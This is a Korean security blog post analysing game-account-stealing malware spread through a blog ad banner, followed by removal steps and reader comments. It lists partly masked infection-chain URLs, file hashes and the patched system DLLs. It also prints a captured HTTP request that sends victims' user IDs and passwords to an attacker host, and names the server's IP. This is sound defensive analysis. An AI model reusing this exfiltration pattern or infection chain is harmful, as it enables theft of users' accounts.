블로그 광고 배너를 통한 온라인 게임 악성코드 유포 (2011.7.24)
벌새::Analysis특히 해당 악성 스크립트는 토요일(23일)과 일요일(24일)을 비교하였을 경우 경로는 동일하지만 보안 제품의 진단으로 인하여 현재는 변형되었으며 해당 내용은 토요일 기준으로 작성되었음을 밝힙니다.
참고로 해당 악성코드는 최종적으로 기존의 imm32.dll, win32.dll 파일과 유사하므로 참고하시기 바랍니다.
h**p://banner.**get.co.kr/ads/adgetS2.js
h**p://bn.weather*.co.kr/nh/lz.html
ㄴ h**p://bn.weather*.co.kr/nh/q.html
ㄴ h**p://bn.weather*.co.kr/nh/v3.htm
ㄴ h**p://bn.weather*.co.kr/nh/main.swf
ㄴ h**p://coverdance.**oul.co.kr/css/q722.txt
ㄴ h**p://bn.weather*.co.kr/nh/e.htm :: 다운로드 불가
ㄴ h**p://bn.weather*.co.kr/nh/w.html
ㄴ h**p://js.tongji.linezing.com/2259080/tongji.js
사용된 악성 스크립트 진단 상태는 lz.html 파일에 대하여 알약(ALYac) 2.0 보안 제품에서 Exploit.Html.Infected.G 진단명으로 진단되고 있으며, q.html 파일에 대하여 Exploit.JS.Iframe.D 진단명으로 진단되고 있습니다.
실제적으로 진단이 필요한 v3.htm 파일에 대해서는 알약(ALYac) 2.0 보안 제품에서 Exploit.JS.Mult.Swf.F 진단명으로 진단되고 있으며, Adobe Flash Player 취약점을 이용한 main.swf 파일은 Exploit.SWF.Downloader 진단명으로 진단되고 있습니다.
그 외 w.html 파일에 대해서는 Norman 보안 제품에서 JS/ShellCode.B 진단명으로 진단되고 있습니다.
이들 악성코드 유포에 사용되는 취약점은 Windows 보안 업데이트와 Adobe Flash Player 최신 버전 사용으로 근본적인 예방이 가능하므로 업데이트 체크를 반드시 하시고 인터넷을 이용하시기 바랍니다.
최종적으로 다운로드된 암호화된 q722.txt 파일을 실행 가능하도록 한 실행 파일(MD5 : 35767fd7af8fa979bf1344ed0e99f43a)에 대하여 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.imm 진단명으로 진단되고 있습니다.
해당 실행 파일 내부 정보를 확인해보면 안철수연구소(AhnLab)에서 제작한 파일로 위장을 하고 있는 것을 확인할 수 있습니다.
C:\WINDOWS\system32\imm32.dll :: 변경 전 - 110,080 Bytes / 변경 후 - 111,104 Bytes
- MD5 : 150db1e953d8c65d221ffdc58abb302b
- AhnLab V3 : Win-Trojan/Patched.DE (VirusTotal : 32/43)
C:\WINDOWS\system32\imm32.dlllNSD5x.tmp :: 정상 파일
※ 해당 파일은 imm32.dll(6자리 영문+숫자).tmp 형태 파일로 imm32.dll 백업 파일입니다.
C:\WINDOWS\system32\win32.dll :: 시스템(S), 숨김(H) 속성
- MD5 : de0cc2cf4f63f19cf6f2c4b014383f16
- AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 14/43)
C:\WINDOWS\system32\win32.dll.KhbL.tmp :: 정상 파일
※ 해당 파일은 win32.dll.(4자리 영문).tmp 형태입니다.
감염된 파일을 살펴보면 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일을 패치하여 정상 파일은 imm32.dll(6자리 영문+숫자).tmp 파일 형태로 백업을 하고, imm32.dll 파일은 악의적인 기능을 하는 파일로 변경이 이루어집니다.
특히 패치된 imm32.dll 파일의 파일 크기는 유사하며 내부 정보가 동일하므로 사용자 입장에서는 수정된 날짜로 악성 여부를 판단해야 할 것으로 보입니다.
시스템 숨김 속성으로 존재하는 win32.dll(Ahnl2) 파일은 안철수연구소(AhnLab)에서 제작한 파일로 위장하고 있으며, 해당 파일은 알약(ALYac), V3 보안 제품 무력화 기능을 포함하고 있습니다.
win32.dll 파일의 세부적인 기능을 살펴보면 사용자가 해당 파일에서 지정한 프로그램 및 온라인 게임(한게임, 넷마블, 피망, 아이온, 불멸, 마에스티아 등)을 실행하여 로그인을 하는 과정에서 계정 정보를 외부로 탈취하는 행위를 합니다.
GET /nm/post.asp?Game=08¶=q722&ves=009&d00=NAIMA&d01=NAIMA&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=&d31=&d32=&d40=0&d45=0&d42=0&d60=&d61=&d70=0&d71=0&d50=&d90=1348 HTTP/1.1
User-Agent: IE6.0
Host: q722.dfjjke646qw.com
수집된 온라인 게임 계정 정보는 홍콩(HongKong)에 위치한 180.178.41.109 서버로 전송되는 것을 확인할 수 있습니다.
테스트에 사용된 악성코드는 안철수연구소(AhnLab)에서 제공하는 전용 백신(Removal Tool for OnlineGameHack(Integration #2))을 통해 진단 및 치료가 이루어지고 있는 것을 확인하였습니다.
만약 수동으로 문제 해결을 원하시는 분들은 다음 절차에 따라 진행하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)
1. 윈도우 탐색기에서 C:\WINDOWS\system32\imm32.dll 파일을 imm32.dll- 파일로 확장자명을 변경합니다.(※ 해당 파일 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 imm32.dll 파일이 복원되어 생성됩니다.)
2. C:\WINDOWS\system32\win32.dll 파일을 찾아 수동으로 삭제합니다.
win32.dll 파일은 폴더 옵션에서 [보호된 운영 체제 파일 숨기기(권장)] 항목의 체크 해제 및 [숨김 파일 및 폴더 표시] 항목에 체크를 해야지 윈도우 탐색기로 확인이 가능하므로 참고하시기 바랍니다.
3. C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp 파일을 win32.dll.(4자리 영문).tmp- 파일로 확장자명을 변경합니다.
4. 반드시 시스템 재부팅을 합니다.
5. 다음의 파일을 수동으로 삭제하시기 바랍니다.
- C:\WINDOWS\system32\imm32.dll-
- C:\WINDOWS\system32\imm32.dll(6자리 영문+숫자).tmp
- C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp-
이번 악성코드 중에서 [C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp] 파일의 경우 현재 안철수연구소(AhnLab) 전용 백신에서는 Win-Trojan/Infostealer.variant 진단명으로 진단되는 것으로 확인되고 있습니다.
실제 파일 내부를 확인해보면 해당 파일은 lpk.dll(Language Pack) 파일의 백업 파일로 확인되고 있으며, 정상적인 lpk.dll 파일과 비교하여 해시(Hash)값이 동일합니다.
하지만 lpk.dll 파일과 비교를 해보면 보안(Security) 영역에서 일부 권한이 수정된 것을 확인할 수 있는 수정된 파일입니다.
해당 진단의 경우 바이러스토탈(VirusTotal)에서는 진단되지 않고 있지만, 악성코드 감염 또는 악의적인 동작에 필요한 수정이 아닐까 추정됩니다.
어차피 해당 파일도 악성코드 감염으로 인해 생성된 파일 중 하나이며 삭제해도 무방한 파일이므로 참고하시기 바랍니다.
마지막으로 해당 악성코드 유포가 블로그 광고 배너를 통해 유포되었으며, 제가 운영하는 울지않는벌새 블로그에서도 최소 1시간 이상 감염을 유발하였기에 사과를 드립니다.(※ 토요일에 해당 유포를 확인한 즉시 광고 배너를 임시적으로 제거하였습니다.)
'벌새::Analysis' 카테고리의 다른 글
| 검색 도우미 : PV Searching Decoder 1.0 (1) | 2011.07.25 |
|---|---|
| 개인정보 보안 솔루션 : 마이키퍼(MyKeeper) (0) | 2011.07.25 |
| 블로그 광고 배너를 통한 온라인 게임 악성코드 유포 (2011.7.24) (15) | 2011.07.24 |
| 온라인 게임 계정 탈취 목적의 ws2help.dll, Sleep.dll 악성코드 유포 (2011.7.23) (77) | 2011.07.23 |
| 광고 프로그램 속에 숨어있는 온라인 게임 악성코드 유포 사례 (1) | 2011.07.22 |
| 악성코드 치료 프로그램 : 클리어피씨(ClearPC) - NClearPC 1.0 (2) | 2011.07.22 |
댓글을 달아 주세요
좋은 정보 감사합니다.
저도 어제 떼어냈습니다. ㅠㅜ.
이거 언제부터 바이러스 유포하기 시작했나요?... 요 몇일 사이 방문자가 팍 죽어서 걱정하고 있는데 말이죠....
그런데 저는 v3인 lite인데 바이러스가 검사되지 않고 있더군요.
취약점 패치하게 되면 감염되지 않아 실시간 감시로 안잡히나요?
아마 토요일 오전~정오경에 시작되었던 것으로 기억합니다.
벌새님 그 요즘 호스트변조 바이러스가 뜨고있다는데
그것좀 포스팅좀 부탁드려요
샘플 확보와 분석 가능한 수준이면 올려보겠습니다.
저도 어제 다음 블로그에서
블로거 분들 글읽고 있는데 알약에서 계속 트로이 목마하고
악성코드 감지되서 자동치료 뜨더라구요
찝찝해서 인터넷 임시파일 다 삭지우고(다음 클리너)
알약으로 검사도 해봅니다
배너에서 임시 인터넷 파일로 악성코드가 심겨지는거같더라구요
네~ 그렇습니다.
동일한 경로를 통해 변종도 뿌리고 있는 상태입니다.
비밀댓글입니다
네~ 맞습니다.^^
저번에 마이 어쩌고 사건이 생각나네요 예전보다 더 지능화되어가는것같습니다
어렵네요?;;
V3kill.exe가 사이트가드, V3 lite에 의해 차단되었는데 이건 무슨 상황인가요?; v3kill.exe이 바이러스이라는 건 가요? 바이러스라면 삭제해도 되는 프로그램인가요?
V3kill.exe 파일을 어디서 다운로드하였는지 모르지만, 안철수연구소 홈페이지 전용 백신 게시판을 이용하시기 바랍니다.
게임핵
win32.dll 파일이없어요.. 폴더내용표시로 설정했는데도 없네요ㅠㅠ
악성코드 종류에 따라서는 win32.dll 이외에 xp32.dll, sleep.dll 등 다양한 이름으로 생성될 수 있습니다.
게임핵
sleep.dll 찾았는데 삭제가 안되요..
http://hummingbird.tistory.com/3126 참고하세요.